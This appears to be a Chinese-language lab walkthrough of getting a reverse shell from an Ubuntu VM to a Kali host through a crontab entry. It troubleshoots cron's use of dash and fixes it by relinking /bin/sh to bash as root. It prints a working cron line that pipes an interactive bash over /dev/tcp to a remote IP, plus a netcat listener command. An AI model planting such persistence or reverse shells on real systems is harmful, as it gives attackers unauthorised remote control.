一、实验环境
Ubuntu:IP地址:192.168.223.156
Kali : IP地址:192.168.223.152
二、编写crontab计划任务
在Ubuntu的系统中使用crontab -e命令编写计划任务,如下所示:
作用:是将一个交互式的bash shell的输出和错误发送到kali的8888端口,并将输入也从该端口读取。
三、在kali中监听8888端口
nc -lp 8888
-l:代表开启监听
-p:代表指定端口号
结果发现,等了两三分钟,一点反应都没有,没收到返回的shell;
因此不得不在Ubuntu中查看它的日志,使用
tail -f /var/log/syslog查看
如图所示,出现了No MTA installed ,discarding output
该信息提示没有安装邮件服务MTA(因特网邮件传送代理;Mail Transfer Agent),因为cron的错误信息是通过邮件发送的,所以这应该不是报的错误,为了能够查看到到错误,可以采取以下措施:
使用crontab -e再次修改计划任务,使得错误信息能够输入到一个文件中,方便我们查看
* * * * * bash -i '>& /dev/tcp/192.168.0.127/8888 0>&1'>/tmp/error.txt 2>&1
可以看到,不存在/bin/bash这个文件,或者说是没被找到,也就是说linux中cron的命令执行的shell环境是/bin/sh。查看后发现,sh是指向dash的软连接,由于dash的shell是没有交互能力的,所以要将sh的软链接修改为bash,注意要在root权限下进行修改!!!
ln - s -f bash /bin/sh
再次修改crontab计划
四、在kali上监听8888端口
可见远程成功,成功反弹shell!
总结:1.在编写crontab计划任务的时候要在root权限下进行编写
2.要将sh的软连接文件指向有交互性的bash上
